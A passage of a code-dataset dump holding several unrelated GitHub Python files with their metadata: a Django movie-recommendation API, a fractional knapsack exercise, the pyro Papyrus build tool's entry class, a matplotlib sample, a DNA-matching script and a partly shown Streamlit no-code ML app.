print(-1)\n","repo_name":"shoark7/algorithm-with-python","sub_path":"etc_examples/baekjoon/_01024_series_int.py","file_name":"_01024_series_int.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"ko","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"13913109093","text":"from rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom api.models import Movie, Rate, Cluster, Profile,Movie_Cluster_Kmeans, Movie_Cluster_Hmeans, Movie_Cluster_EM\nfrom api.serializers import MovieSerializer, Movie_Age_Serializer, Movie_Genre_Serializer\nfrom rest_framework.response import Response\nfrom django.db.models import Avg\nimport pandas as pd\nimport random, pprint\n\n@api_view(['GET', 'POST', 'DELETE'])\ndef movies(request):\n if request.method == 'GET':\n id = request.GET.get('id', request.GET.get('movie_id', None))\n title = request.GET.get('title', None)\n movies = Movie.objects.all()\n \n if id:\n movies = movies.filter(pk=id)\n if title:\n movies = movies.filter(title__icontains=title)\n \n num = request.GET.get('num', None)\n canmore = True\n if len(movies) >= 12:\n if num:\n num = int(num)\n movies = movies[num*12:(num+1)*12]\n if len(movies) < 12:\n canmore = False\n else:\n movies = movies[:12]\n else:\n canmore = False\n serializer = MovieSerializer(movies, many=True)\n return Response(data=[serializer.data, canmore], status=status.HTTP_200_OK)\n\n if request.method == 'DELETE':\n movie = Movie.objects.all()\n movie.delete()\n return Response(status=status.HTTP_200_OK)\n\n if request.method == 'POST':\n movies = request.data.get('movies', None)\n for movie in movies:\n id = movie.get('id', None)\n title = movie.get('title', None)\n genres = movie.get('genres', None)\n\n if not (id and title and genres):\n continue\n if Movie.objects.filter(id=id).count() > 0 or Movie.objects.filter(title=title).count() > 0:\n continue\n\n Movie(id=id, title=title, genres='|'.join(genres)).save()\n\n return Response(status=status.HTTP_200_OK)\n\n@api_view(['GET', 'POST', 'DELETE'])\ndef homepage(request):\n\n movies = Movie.objects.all().order_by('-watch_count')[:10]\n\n serializer = MovieSerializer(movies, many=True)\n\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n\n@api_view(['GET', 'POST', 'DELETE'])\ndef genres(request):\n id = request.GET.get('id', request.GET.get('movie_id', None))\n title = request.GET.get('title', None)\n genre = request.GET.get('genre', None)\n watch_count = request.GET.get('watch_count', None)\n movies = Movie.objects.all().order_by('-watch_count')\n\n if id:\n movies = movies.filter(pk=id)\n if title:\n movies = movies.filter(title__icontains=title)\n if genre:\n movies = movies.filter(genres__icontains=genre)\n serializer = Movie_Genre_Serializer(movies, many=True)\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n\n@api_view(['GET', 'POST', 'DELETE'])\ndef ages(request):\n age = request.GET.get('age', None)\n\n if age == \"\":\n print('여기떳다아아')\n age_index=\"\"\n elif age == 'Under 18':\n age_index = 1\n elif age == \"18-24\":\n age_index = 18\n elif age == \"25-34\":\n age_index = 25\n elif age == \"35-44\":\n age_index = 35\n elif age == \"45-49\":\n age_index = 45\n elif age == \"50-55\":\n age_index = 50\n else:\n age_index = 56\n\n if age_index:\n profiles = Profile.objects.filter(age=age_index)\n else:\n profiles = Profile.objects.all()\n rates = Rate.objects.filter(UserID__in=profiles)\n rates = rates.values('MovieID', 'MovieID__title', 'MovieID__genres', 'MovieID__watch_count', 'MovieID__plot', 'MovieID__url', 'MovieID__director', 'MovieID__casting').annotate(Avg('rating'))\n rates = rates.order_by('-MovieID__watch_count')\n\n serializer = Movie_Age_Serializer(rates, many=True)\n\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n\n@api_view(['GET', 'POST', 'DELETE'])\ndef occupations(request):\n occupation = request.GET.get('occupation', None)\n\n if occupation:\n profiles = Profile.objects.filter(occupation=occupation)\n else:\n profiles = Profile.objects.all()\n rates = Rate.objects.filter(UserID__in=profiles)\n\n rates = rates.values('MovieID', 'MovieID__title', 'MovieID__genres', 'MovieID__watch_count', 'MovieID__plot', 'MovieID__url', 'MovieID__director', 'MovieID__casting').annotate(Avg('rating'))\n rates = rates.order_by('-MovieID__watch_count')\n serializer = Movie_Age_Serializer(rates, many=True)\n\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n\n@api_view(['GET', 'POST', 'DELETE'])\ndef genders(request):\n gender = request.GET.get('gender', None)\n\n if gender:\n profiles = Profile.objects.filter(gender=gender)\n else:\n profiles = Profile.objects.all()\n rates = Rate.objects.filter(UserID__in=profiles)\n rates = rates.values('MovieID', 'MovieID__title', 'MovieID__genres', 'MovieID__watch_count', 'MovieID__plot', 'MovieID__url', 'MovieID__director', 'MovieID__casting').annotate(Avg('rating'))\n rates = rates.order_by('-MovieID__watch_count')\n serializer = Movie_Age_Serializer(rates, many=True)\n\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n\n@api_view(['GET', 'POST', 'DELETE'])\ndef detail(request, movie_id):\n movie = Movie.objects.get(pk=movie_id)\n movie.watch_count += 1\n movie.save()\n cluster = Cluster.objects.get(pk=1)\n result = []\n serializer = MovieSerializer(movie)\n result.append(serializer.data)\n\n # H clustering\n if cluster.way == 'H':\n getMovie = Movie_Cluster_Hmeans.objects.get(MovieId=movie.id)\n if cluster.n_component == 3:\n lists = Movie_Cluster_Hmeans.objects.filter(H3=getMovie.H3)\n elif cluster.n_component == 4:\n lists = Movie_Cluster_Hmeans.objects.filter(H4=getMovie.H4)\n elif cluster.n_component == 5:\n lists = Movie_Cluster_Hmeans.objects.filter(H5=getMovie.H5)\n elif cluster.n_component == 6:\n lists = Movie_Cluster_Hmeans.objects.filter(H6=getMovie.H6)\n elif cluster.n_component == 7:\n lists = Movie_Cluster_Hmeans.objects.filter(H7=getMovie.H7)\n\n # Kmeans clustering\n if cluster.way == 'K':\n getMovie = Movie_Cluster_Kmeans.objects.get(MovieId=movie.id)\n if cluster.n_component == 3:\n lists = Movie_Cluster_Kmeans.objects.filter(K3=getMovie.K3)\n elif cluster.n_component == 4:\n lists = Movie_Cluster_Kmeans.objects.filter(K4=getMovie.K4)\n elif cluster.n_component == 5:\n lists = Movie_Cluster_Kmeans.objects.filter(K5=getMovie.K5)\n elif cluster.n_component == 6:\n lists = Movie_Cluster_Kmeans.objects.filter(K6=getMovie.K6)\n elif cluster.n_component == 7:\n lists = Movie_Cluster_Kmeans.objects.filter(K7=getMovie.K7)\n\n # EM clustering\n if cluster.way == 'EM':\n getMovie = Movie_Cluster_EM.objects.get(MovieId=movie.id)\n if cluster.n_component == 3:\n lists = Movie_Cluster_EM.objects.filter(EM3=getMovie.EM3)\n elif cluster.n_component == 4:\n lists = Movie_Cluster_EM.objects.filter(EM4=getMovie.EM4)\n elif cluster.n_component == 5:\n lists = Movie_Cluster_EM.objects.filter(EM5=getMovie.EM5)\n elif cluster.n_component == 6:\n lists = Movie_Cluster_EM.objects.filter(EM6=getMovie.EM6)\n elif cluster.n_component == 7:\n lists = Movie_Cluster_EM.objects.filter(EM7=getMovie.EM7)\n\n tmp = random.sample(list(lists), 5)\n for t in tmp:\n movie = Movie.objects.get(title=t.MovieId)\n serializer = MovieSerializer(movie)\n result.append(serializer.data)\n return Response(data=result, status=status.HTTP_200_OK)\n\n@api_view(['GET', 'POST', 'DELETE'])\ndef getarray(request):\n\n array = []\n\n genre_number = {'Action':0,'Adventure':1,'Animation':2,\"Children's\":3,'Comedy':4,'Crime':5,'Documentary':6,\n 'Drama':7,'Fantasy':8,'Film-Noir':9, 'Horror':10, 'Musical':11, 'Mystery':12,\n 'Romance':13,'Sci-Fi':14,'Thriller':15,'War':16,'Western':17}\n\n movies = Movie.objects.all()\n movies_count = len(movies)\n\n for i in range(movies_count):\n tmp_array = [0]*19\n\n movie_genres = movies[i].genres.split('|')\n tmp_array[18] = movies[i].pk\n\n for j in range(len(movie_genres)):\n tmp_array[genre_number[movie_genres[j]]] = 1\n\n array.append(tmp_array)\n\n df = pd.DataFrame(array)\n df.to_csv(\"answer.csv\", header=None, index=None)\n\n return Response(status=status.HTTP_200_OK)\n\n@api_view(['GET'])\ndef getrate(request, movie_id, profile_id):\n profile = Profile.objects.get(pk=profile_id)\n movie = Movie.objects.get(pk=movie_id)\n rate = Rate.objects.filter(UserID=profile, MovieID=movie)\n\n if rate:\n result = {'flag':True, 'rate':rate[0].rating}\n else:\n result = {'flag':False}\n\n return Response(data=result, status=status.HTTP_200_OK)\n","repo_name":"frtt0608/movieJoa","sub_path":"Backend_Django/api/views/movie_views.py","file_name":"movie_views.py","file_ext":"py","file_size_in_byte":9077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"877092029","text":"# Uses python3\nimport sys\n\ndef get_optimal_value(capacity, weights, values):\n value = 0\n max_capacity = capacity[0]\n \n weights = np.array(weights)\n values = np.array(values)\n per_unit_val = (values/weights).argsort()[::-1]\n \n while max_capacity != 0:\n for i in range(capacity[1]):\n weight_increment = min(max_capacity, weights[per_unit_val[i]])\n max_capacity -= weight_increment\n value += (values[per_unit_val[i]]/weights[per_unit_val[i]])*weight_increment\n \n return value\n\n\nif __name__ == \"__main__\":\n data = list(map(int, sys.stdin.read().split()))\n n, capacity = data[0:2]\n values = data[2:(2 * n + 2):2]\n weights = data[3:(2 * n + 2):2]\n opt_value = get_optimal_value(capacity, weights, values)\n print(\"{:.10f}\".format(opt_value))\n","repo_name":"Samarth2506/Learning","sub_path":"Data_Structures_Algorithms/Algorithmic_Toolbox_Coursera/week3_greedy_algorithms/2_maximum_value_of_the_loot/fractional_knapsack.py","file_name":"fractional_knapsack.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73179626728","text":"import argparse\r\nimport logging\r\nimport os\r\nimport sys\r\n\r\nfrom pyro.Enums.Event import (BuildEvent,\r\n ImportEvent,\r\n CompileEvent,\r\n AnonymizeEvent,\r\n PackageEvent,\r\n ZipEvent)\r\nfrom pyro.BuildFacade import BuildFacade\r\nfrom pyro.Comparators import startswith\r\nfrom pyro.PapyrusProject import PapyrusProject\r\nfrom pyro.PathHelper import PathHelper\r\nfrom pyro.PexReader import PexReader\r\nfrom pyro.ProjectOptions import ProjectOptions\r\n\r\n\r\nclass Application:\r\n logging.basicConfig(stream=sys.stdout, level=logging.DEBUG, format='%(asctime)s [%(levelname).4s] %(message)s')\r\n log = logging.getLogger('pyro')\r\n\r\n args: argparse.Namespace = None\r\n\r\n def __init__(self, parser: argparse.ArgumentParser) -> None:\r\n self.parser = parser\r\n\r\n self.args = self.parser.parse_args()\r\n\r\n if self.args.show_help:\r\n self.parser.print_help()\r\n sys.exit(1)\r\n\r\n # set up log levels\r\n log_level_argv = self.args.log_level.upper()\r\n log_level = getattr(logging, log_level_argv, logging.DEBUG)\r\n self.log.setLevel(log_level)\r\n\r\n Application.log.debug(f'Set log level to: {log_level_argv}')\r\n\r\n self.args.input_path = self._try_fix_input_path(self.args.input_path or self.args.input_path_deprecated)\r\n\r\n if not self.args.create_project and not os.path.isfile(self.args.input_path):\r\n Application.log.error(f'Cannot load nonexistent PPJ at given path: \"{self.args.input_path}\"')\r\n sys.exit(1)\r\n\r\n @staticmethod\r\n def _try_fix_input_path(input_path: str) -> str:\r\n if not input_path:\r\n Application.log.error('required argument missing: -i INPUT.ppj')\r\n sys.exit(1)\r\n\r\n if startswith(input_path, 'file:', ignorecase=True):\r\n full_path = PathHelper.url2pathname(input_path)\r\n input_path = os.path.normpath(full_path)\r\n\r\n if not os.path.isabs(input_path):\r\n cwd = os.getcwd()\r\n Application.log.info(f'Using working directory: \"{cwd}\"')\r\n\r\n input_path = os.path.join(cwd, input_path)\r\n\r\n Application.log.info(f'Using input path: \"{input_path}\"')\r\n\r\n return input_path\r\n\r\n @staticmethod\r\n def _validate_project_file(ppj: PapyrusProject) -> None:\r\n if ppj.imports_node is None and \\\r\n (ppj.scripts_node is not None or ppj.folders_node is not None):\r\n Application.log.error('Cannot proceed without imports defined in project')\r\n sys.exit(1)\r\n\r\n if ppj.options.package and ppj.packages_node is None:\r\n Application.log.error('Cannot proceed with Package enabled without Packages defined in project')\r\n sys.exit(1)\r\n\r\n if ppj.options.zip and ppj.zip_files_node is None:\r\n Application.log.error('Cannot proceed with Zip enabled without ZipFile defined in project')\r\n sys.exit(1)\r\n\r\n @staticmethod\r\n def _validate_project_paths(ppj: PapyrusProject) -> None:\r\n compiler_path = ppj.get_compiler_path()\r\n if not compiler_path or not os.path.isfile(compiler_path):\r\n Application.log.error('Cannot proceed without compiler path')\r\n sys.exit(1)\r\n\r\n flags_path = ppj.get_flags_path()\r\n if not flags_path:\r\n Application.log.error('Cannot proceed without flags path')\r\n sys.exit(1)\r\n\r\n if not ppj.options.game_type:\r\n Application.log.error('Cannot determine game type from arguments or Papyrus Project')\r\n sys.exit(1)\r\n\r\n if not os.path.isabs(flags_path) and \\\r\n not any([os.path.isfile(os.path.join(import_path, flags_path)) for import_path in ppj.import_paths]):\r\n Application.log.error('Cannot proceed without flags file in any import folder')\r\n sys.exit(1)\r\n\r\n def run(self) -> int:\r\n \"\"\"\r\n Entry point\r\n \"\"\"\r\n _, extension = os.path.splitext(os.path.basename(self.args.input_path).casefold())\r\n\r\n if extension == '.pex':\r\n header = PexReader.dump(self.args.input_path)\r\n Application.log.info(f'Dumping: \"{self.args.input_path}\"\\n{header}')\r\n sys.exit(0)\r\n elif extension not in ('.ppj', '.pyroproject'):\r\n Application.log.error('Cannot proceed without PPJ file path')\r\n sys.exit(1)\r\n\r\n options = ProjectOptions(self.args.__dict__)\r\n ppj = PapyrusProject(options)\r\n\r\n self._validate_project_file(ppj)\r\n\r\n if ppj.scripts_node is not None or ppj.folders_node is not None or ppj.remote_paths:\r\n ppj.try_initialize_remotes()\r\n\r\n if ppj.use_pre_import_event:\r\n ppj.try_run_event(ImportEvent.PRE)\r\n\r\n ppj.try_populate_imports()\r\n\r\n if ppj.use_post_import_event:\r\n ppj.try_run_event(ImportEvent.POST)\r\n\r\n ppj.try_set_game_type()\r\n ppj.find_missing_scripts()\r\n ppj.try_set_game_path()\r\n\r\n self._validate_project_paths(ppj)\r\n\r\n Application.log.info('Imports found:')\r\n for path in ppj.import_paths:\r\n Application.log.info(f'+ \"{path}\"')\r\n\r\n Application.log.info('Scripts found:')\r\n for _, path in ppj.psc_paths.items():\r\n Application.log.info(f'+ \"{path}\"')\r\n\r\n build = BuildFacade(ppj)\r\n\r\n # bsarch path is not set until BuildFacade initializes\r\n if ppj.options.package and not os.path.isfile(ppj.options.bsarch_path):\r\n Application.log.error('Cannot proceed with Package enabled without valid BSArch path')\r\n sys.exit(1)\r\n\r\n if ppj.use_pre_build_event:\r\n ppj.try_run_event(BuildEvent.PRE)\r\n\r\n if build.scripts_count > 0:\r\n if ppj.use_pre_compile_event:\r\n ppj.try_run_event(CompileEvent.PRE)\r\n\r\n build.try_compile()\r\n\r\n if ppj.use_post_compile_event:\r\n ppj.try_run_event(CompileEvent.POST)\r\n\r\n if ppj.options.anonymize:\r\n if build.get_compile_data().failed_count == 0 or ppj.options.ignore_errors:\r\n if ppj.use_pre_anonymize_event:\r\n ppj.try_run_event(AnonymizeEvent.PRE)\r\n\r\n build.try_anonymize()\r\n\r\n if ppj.use_post_anonymize_event:\r\n ppj.try_run_event(AnonymizeEvent.POST)\r\n else:\r\n Application.log.error(f'Cannot anonymize scripts because {build.get_compile_data().failed_count} scripts failed to compile')\r\n sys.exit(build.get_compile_data().failed_count)\r\n else:\r\n Application.log.info('Cannot anonymize scripts because Anonymize is disabled in project')\r\n\r\n if ppj.options.package:\r\n if build.get_compile_data().failed_count == 0 or ppj.options.ignore_errors:\r\n if ppj.use_pre_package_event:\r\n ppj.try_run_event(PackageEvent.PRE)\r\n\r\n build.try_pack()\r\n\r\n if ppj.use_post_package_event:\r\n ppj.try_run_event(PackageEvent.POST)\r\n else:\r\n Application.log.error(f'Cannot create Packages because {build.get_compile_data().failed_count} scripts failed to compile')\r\n sys.exit(build.get_compile_data().failed_count)\r\n elif ppj.packages_node is not None:\r\n Application.log.info('Cannot create Packages because Package is disabled in project')\r\n\r\n if ppj.options.zip:\r\n if build.get_compile_data().failed_count == 0 or ppj.options.ignore_errors:\r\n if ppj.use_pre_zip_event:\r\n ppj.try_run_event(ZipEvent.PRE)\r\n\r\n build.try_zip()\r\n\r\n if ppj.use_post_zip_event:\r\n ppj.try_run_event(ZipEvent.POST)\r\n else:\r\n Application.log.error(f'Cannot create ZipFile because {build.get_compile_data().failed_count} scripts failed to compile')\r\n sys.exit(build.get_compile_data().failed_count)\r\n elif ppj.zip_files_node is not None:\r\n Application.log.info('Cannot create ZipFile because Zip is disabled in project')\r\n\r\n if build.scripts_count > 0:\r\n Application.log.info(build.get_compile_data().to_string() if build.get_compile_data().success_count > 0 else 'No scripts were compiled.')\r\n\r\n if ppj.packages_node is not None:\r\n Application.log.info(build.package_data.to_string() if build.package_data.file_count > 0 else 'No files were packaged.')\r\n\r\n if ppj.zip_files_node is not None:\r\n Application.log.info(build.zipping_data.to_string() if build.zipping_data.file_count > 0 else 'No files were zipped.')\r\n\r\n Application.log.info('DONE!')\r\n\r\n if ppj.use_post_build_event and build.get_compile_data().failed_count == 0:\r\n ppj.try_run_event(BuildEvent.POST)\r\n\r\n return build.get_compile_data().failed_count\r\n","repo_name":"fireundubh/pyro","sub_path":"pyro/Application.py","file_name":"Application.py","file_ext":"py","file_size_in_byte":9153,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"53"} +{"seq_id":"34560951808","text":"\"\"\"\nx축 값을 커스텀하는 방법\nxticks: x축을 구성하는 단위를 정의\nxticklabels: x축에 해당하는 라벨을 정의\n\"\"\"\n\nimport matplotlib.pyplot as plt\nfrom numpy.random import randn\n\nr = randn(1000).cumsum()\nprint(r)\nfig = plt.figure()\nax = fig.add_subplot(1, 1, 1)\nax.set_xticks([0, 250, 500, 750, 1000])\nax.set_xticklabels([\"item_1\", \"item_2\", \"item_3\", \"item_4\", \"item_5\"], rotation=45, fontsize='small')\nax.set_title('wow')\nax.set_xlabel('hehe')\nax.plot(r)\n\nplt.show()\n\n\n\n","repo_name":"shinyeoeun/Performance_TestAutomation_Line_App","sub_path":"scripts/template/SAMPLE_Graph.py","file_name":"SAMPLE_Graph.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18753293344","text":"suspects = {\"Eva\": [\"TGAAGGACCTTC\", \"AAAACCTCA\", \"TTAGCTATCGC\", \"TTGTGGTGGC\", \"AGGCCTCA\"],\n \"Larisa\": [\"TGAAGGACCTTC\", \"AAAACCTCA\", \"GCCAGTGCCG\", \"AAGTAGTGAC\", \"AGGCCTCA\"],\n \"Matej\": [\"TGCAGGAACTTC\", \"AAAACCTCA\", \"CCAGCAATCGC\", \"TTGTGGTGGC\", \"AGGCCTCA\"],\n \"Miha\": [\"TGCAGGAACTTC\", \"AAAACCTCA\", \"GCCAGTGCCG\", \"GGGAGGTGGC\", \"GCCACGG\"]}\n\nwith open(\"dna.txt\", \"r\") as dna_file:\n dna = dna_file.read()\n\nfor thief in suspects:\n arrest = True\n for x in suspects[thief]:\n if x not in dna:\n arrest = False\n break\n else:\n print(thief)\n","repo_name":"GeorgSfL/forensic","sub_path":"forensic.py","file_name":"forensic.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15387880016","text":"import streamlit as st\nfrom sklearn.model_selection import train_test_split\nfrom streamlit.runtime.scriptrunner.script_run_context import get_script_run_ctx\nimport sklearn.metrics as metrics\nimport xgboost\nimport time as t\nimport numpy as np\nimport pandas as pd\n\n\n\ndef main() -> None:\n\n \n # Sklearn packages/module metadata\n\n model_selection_dict = { \"Classification\":{\n \"LogisticRegression\":\"sklearn.linear_model\",\n \"XGBClassifier\":\"xgboost.sklearn\",\n \"SVC\":\"sklearn.svm\",\n \"KNeighborsClassifier\":\"sklearn.neighbors\",\n \"GaussianNB\":\"sklearn.naive_bayes\",\n \"BernoulliNB\":\"sklearn.naive_bayes\",\n \"LinearSVC\":\"sklearn.svm\",\n \"MultinomialNB\":\"sklearn.naive_bayes\",\n \"DecisionTreeClassifier\":\"sklearn.tree\",\n \"RandomForestClassifier\":\"sklearn.ensemble\"\n },\n \"Regression\":{\n \"LinearRegression\":\"sklearn.linear_model\",\n \"XGBRegressor\":\"xgboost.sklearn\",\n \"Lasso\":\"sklearn.linear_model\",\n \"ElasticNet\":\"sklearn.linear_model\",\n \"BayesianRidge\":\"sklearn.linear_model\",\n \"Ridge\":\"sklearn.linear_model\",\n \"KNeighborsRegressor\":\"sklearn.neighbors\",\n \"SVR\":\"sklearn.svm\",\n \"DecisionTreeRegressor\":\"sklearn.tree\",\n \"RandomForestRegressor\":\"sklearn.ensemble\"\n }\n } \n\n sklearn_data_dict = {\"module\":\"sklearn.datasets\",\n \"data\":{\n \"Iris (Multi-Class Classification)\":\"load_iris\",\n \"Diabetes (Regression)\":\"load_diabetes\",\n \"Wine (Mult-Class Classification)\":\"load_wine\",\n \"Breast Cancer (Binary Classification)\":\"load_breast_cancer\"\n } \n }\n\n # Data Transformations Dict\n data_preprocess_dict = {\n \"StandardScaler\": {\"class\":\"StandardScaler\",\"module_name\":\"sklearn.preprocessing\"},\n \"MinMaxScaler\": {\"class\":\"MinMaxScaler\",\"module_name\":\"sklearn.preprocessing\"},\n }\n\n ctx = get_script_run_ctx()\n\n #st.write(ctx.session_id)\n\n \n # if hasattr(st.session_state,'user_session_data'):\n # user_session_data = st.session_state.user_session_data[ctx.session_id]\n \n if not hasattr(st.session_state,'user_session_data'):\n st.session_state.user_session_data = {}\n\n if ctx.session_id not in st.session_state.user_session_data:\n st.session_state.user_session_data[ctx.session_id] = {}\n \n \n \n #================== General Use Functions =====================#\n\n\n #import module class\n def import_class(module_name,class_name):\n try:\n module = __import__(module_name, globals(),locals(),[class_name])\n except ImportError:\n return None\n return vars(module)[class_name]\n\n \n def instantiate_obj(class_name,module_name):\n object_instance = import_class(str(module_name),str(class_name))\n return object_instance()\n \n def update_data():\n get_train_test(str(data_key),data_source)\n st.session_state.user_session_data[ctx.session_id]['data_source'] = data_source \n st.session_state.user_session_data[ctx.session_id]['data_key'] = data_key\n\n\n\n def check_cache_data():\n\n # if there is no data then load data\n if 'data' not in st.session_state.user_session_data[ctx.session_id]:\n update_data()\n\n # if the dataset changed then change the dataset\n if 'data_key' in st.session_state.user_session_data[ctx.session_id] and st.session_state.user_session_data[ctx.session_id]['data_key'] != data_key:\n update_data()\n\n if 'data_source' in st.session_state.user_session_data[ctx.session_id] and st.session_state.user_session_data[ctx.session_id]['data_source'] != data_source:\n update_data()\n \n \n \n \n def user_data_check():\n if data_source == 'My Computer':\n st.error('Please upload csv file with your data')\n\n \n\n \n def check_cache_hyperparams():\n module_name = model_selection_dict[prediction_task][algorithm_name]\n\n # Check for change in algo\n if 'pred_algorithm_name' in st.session_state.user_session_data[ctx.session_id] and 'param_algorithm_name' in st.session_state.user_session_data[ctx.session_id]:\n check_1 = st.session_state.user_session_data[ctx.session_id]['pred_algorithm_name'] == st.session_state.user_session_data[ctx.session_id]['param_algorithm_name']\n same_algo_bool = st.session_state.user_session_data[ctx.session_id]['algorithm_name'] == algorithm_name and check_1\n \n elif 'param_algorithm_name' in st.session_state.user_session_data[ctx.session_id]:\n same_algo_bool = st.session_state.user_session_data[ctx.session_id]['param_algorithm_name'] == algorithm_name\n\n elif 'pred_algorithm_name' in st.session_state.user_session_data[ctx.session_id]:\n same_algo_bool = st.session_state.user_session_data[ctx.session_id]['pred_algorithm_name'] == algorithm_name\n \n elif 'pred_algorithm_name' not in st.session_state.user_session_data[ctx.session_id] and 'param_algorithm_name' not in st.session_state.user_session_data[ctx.session_id]:\n same_algo_bool = False\n\n elif st.session_state.user_session_data[ctx.session_id]['algorithm_name'] == algorithm_name:\n same_algo_bool = True\n \n # check for existing hyperparams\n if 'hyperparams' in st.session_state.user_session_data[ctx.session_id] and same_algo_bool :\n #hyperparams = user_session_data.hyperparams\n model = model_instance(str(algorithm_name) ,str(module_name)) #can I call set params on this?\n model_param_dict = st.session_state.user_session_data[ctx.session_id]['hyperparams'] \n if 'dual' in model_param_dict:\n model_param_dict['dual'] = False\n model = model.set_params(**model_param_dict)\n return model, model_param_dict\n else:\n model = model_instance(str(algorithm_name) ,str(module_name))\n model_param_dict = model.get_params()\n st.session_state.user_session_data[ctx.session_id]['hyperparams'] = model_param_dict\n return model, model_param_dict\n \n \n\n\n #================== Model Instance Functions =====================#\n\n \n # instantiate new ml model \n @st.cache_resource \n def model_instance(algorithm_name,module_name):\n\n model = import_class(str(module_name),str(algorithm_name))\n return model()\n \n\n def train_model(data_key,data_source,model):\n \n if 'data' in st.session_state.user_session_data[ctx.session_id]: \n X_train, X_test, y_train, y_test = st.session_state.user_session_data[ctx.session_id]['data']\n model.fit(X_train,y_train)\n return [model,X_test,y_test]\n \n else:\n X_train, X_test, y_train, y_test = get_train_test(str(data_key),data_source) #change function name\n model.fit(X_train,y_train)\n return [model,X_test,y_test]\n\n\n \n #================== Data Related Functions =====================#\n\n \n \n def get_train_test(tableName,data_source) -> list:\n \n \n def split_data(dataframe) -> None:\n X = dataframe.iloc[:,:-1]\n y = dataframe.iloc[:,-1:]\n st.session_state.user_session_data[ctx.session_id]['data'] = train_test_split(X, y, test_size=0.3) \n st.session_state.user_session_data[ctx.session_id]['data_cols'] = dataframe.columns\n return None\n\n\n if data_source == 'My Computer':\n df = pd.read_csv(data_key)\n split_data(df)\n st.session_state.user_session_data[ctx.session_id]['feature_names'] = df.columns\n return st.session_state.user_session_data[ctx.session_id]['data']\n \n if data_source == 'Sklearn Dataset':\n #Instantiate sklearn data object\n dataset_name = sklearn_data_dict['data'][data_key]\n data_module = sklearn_data_dict['module']\n data_instance = instantiate_obj(dataset_name,data_module)\n df = pd.DataFrame(np.column_stack((data_instance['data'],data_instance['target'])),\n columns=[*data_instance['feature_names'],'target'])\n split_data(df)\n return st.session_state.user_session_data[ctx.session_id]['data']\n \n \n \n #================== Frontend Integration =====================#\n \n \n st.sidebar.success('The Research Lab™')\n\n st.header(':green[No]-Code-ML')\n\n # Display the input values\n prediction_task = st.selectbox(\"Prediction Task\",[\"Classification\",\"Regression\"])\n data_source = st.selectbox(\"Data Location\",['My Computer','Sklearn Dataset'])\n if data_source == 'Sklearn Dataset':\n data_key = st.selectbox(\"Choose a Dataset\",[i for i in sklearn_data_dict['data'].keys()])\n if data_source == 'My Computer':\n data_key = st.file_uploader('Upload Data as CSV')\n algorithm_name = st.selectbox(\"Algorithm Type\", [i for i in model_selection_dict[prediction_task].keys()]) \n \n\n # Create Buttons for Setting Model Parameters, Model Training, and Data Transformations \n params_btn,transform_data_btn,train_btn,predict_btn = st.columns([0.07,0.06,0.04,0.04],gap=\"small\")\n with params_btn:\n params_bool = st.selectbox('Set Model Params',['No','Yes'],index=0)\n with transform_data_btn:\n transform_data_bool = st.selectbox('Transform Data',['No','Yes'],index=0)\n with train_btn:\n train_model_bool = st.selectbox('Train',['No','Yes'],index=0)\n with predict_btn:\n predict_bool = st.selectbox('Predict',['No','Yes'],index=0)\n\n \n \n \n\n #Dictionary to hold new parameters\n model_param_dict = {}\n params_form = st.empty() \n\n # Set Model Params Functionality\n if params_bool == 'Yes' and 'Yes' not in [transform_data_bool,train_model_bool,predict_bool]:\n\n with params_form.form(\"hyperparam_form\"):\n \n _,model_param_dict = check_cache_hyperparams()\n \n \n \n st.write(f\" :green[{algorithm_name}] Hyperparameters\")\n \n for key,value in model_param_dict.items():\n if key == 'dual':\n st.success(key + \" must be False\")\n value = False\n original_type = 'NoneType' if isinstance(model_param_dict[key],type(None)) else type(model_param_dict[key])\n model_param_dict[key] = None if original_type == 'NoneType' else original_type(st.text_input(f\"{key}\",model_param_dict.get(key,value)))\n submitted = st.form_submit_button(\"Update Hyperparameters\")\n\n if submitted:\n st.session_state.user_session_data[ctx.session_id]['hyperparams'] = model_param_dict\n st.session_state.user_session_data[ctx.session_id]['algorithm_name'] = algorithm_name\n st.session_state.user_session_data[ctx.session_id]['param_algorithm_name'] = algorithm_name\n params_form.empty()\n \n \n\n\n # Logic for training a model\n if train_model_bool == 'Yes' and 'Yes' not in [params_bool,transform_data_bool,predict_bool]:\n user_data_check()\n check_cache_data()\n model, _ = check_cache_hyperparams()\n trained_model,X_test,y_test = train_model(data_key,data_source,model)\n st.session_state.user_session_data[ctx.session_id]['model'] = trained_model\n\n st.title(\"Model Accuracy\")\n if prediction_task == 'Classification':\n report = metrics.classification_report(trained_model.predict(X_test),y_test,output_dict=True)\n st.table(pd.DataFrame(report).T)\n \n else:\n st.text(trained_model.score(X_test,y_test))\n\n\n # perform data transformations\n if transform_data_bool == 'Yes' and 'Yes' not in [params_bool,train_model_bool,predict_bool]:\n user_data_check()\n check_cache_data()\n\n X_train,X_test,y_train,y_test = st.session_state.user_session_data[ctx.session_id]['data']\n\n try:\n st.table(X_train.describe())\n except:\n st.table(pd.DataFrame(X_train,columns=st.session_state.user_session_data[ctx.session_id]['data_cols'][0:-1]).describe())\n\n\n data_transformation_form = st.empty()\n with data_transformation_form.form(\"transformData\"):\n transform_x = st.selectbox(\"Independent Variable Transformations\",['None','StandardScaler','MinMaxScaler','Log-Transform'])\n transform_y = st.selectbox(\"Dependent Variable Transformations\",['None','Log-Transform'])\n submitted = st.form_submit_button(\"submit\")\n \n if submitted:\n if transform_x != 'None' and transform_x != 'Log-Transform':\n module_name = data_preprocess_dict[transform_x][\"module_name\"]\n object_class = data_preprocess_dict[transform_x][\"class\"]\n data_preprocessor = instantiate_obj(object_class,module_name)\n 